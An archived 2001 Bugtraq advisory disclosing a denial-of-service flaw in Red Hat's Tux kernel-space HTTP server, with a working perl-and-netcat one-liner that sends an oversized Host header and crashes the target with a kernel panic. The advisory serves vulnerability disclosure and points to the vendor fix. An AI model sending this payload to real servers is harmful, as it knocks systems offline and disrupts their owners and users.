linux, säkerhet

7435103 2001-11-05 12:57 +0000  /79 rader/ Aiden ORawe <a.orawe@ntlworld.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-11-05  18:34  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <19675>
Ärende: RH Linux Tux HTTPD DoS
------------------------------------------------------------
From: "Aiden ORawe" <a.orawe@ntlworld.com>
To: <bugtraq@securityfocus.com>
Message-ID: <001201c165f9$64c2e1c0$6e00a8c0@win2ksa00>


TUX HTTPD Denial of Service Condition
=============================


Background:
-------------

Tux is a Kernel-Space HTTP server coded for optimal performance (IRQ
Affinity,HTTP compression, direct scatter-gather DMA etc.)  It is
meant to be used as the main HTTP server for static objects with
requests for dynamic content being passed to a user-space HTTPD
server such as Apache on same box when necessary. Tux is disabled by
default.


Vulnerability:
--------------

It is possible to cause a denial of service condition by submitting
an oversized "Host:" header request to the Tux daemon causing an
assertion failure and eventual Kernel Panic.  A total system reboot
is required to return full functionality. For example the following
script will cause the target box to crash:


perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>


The following output will then generated (edited for brevity):


Code: Bad EIP Value.
 (0)Kernel Panic: Aiee, killing interrupt handler!
In interrupt handler - not syncing!


To the best of my knowledge this is *not* a buffer overflow (despite
apparently being able to overwrite the contents of the EIP register)
and as such cannot be utilised to run arbitrary code.  FYI The Tux
source code contains numerous assertions that are used to safegaurd
data integrity and if any of these assertions fail (as it does in
this case) code execution is halted by making a call to the BUG()
function.


System(s) tested:
-----------------

RedHat Linux 7.2 , Kernel 2.4.7-10 and 2.4.9-7 running TUX-2.1.0-2.


Additional Notes:
-----------------

security@redhat.com where advised of this issue 25 October 2001.


Solution:
---------

See Security Advisory - RHSA-2001:142-15

http://www.redhat.com/support/errata/RHSA-2001-142.html


Thanks:
-------

Michael K. Johnston


============================================================================
===============================
(7435103) /Aiden ORawe <a.orawe@ntlworld.com>/(Ombruten)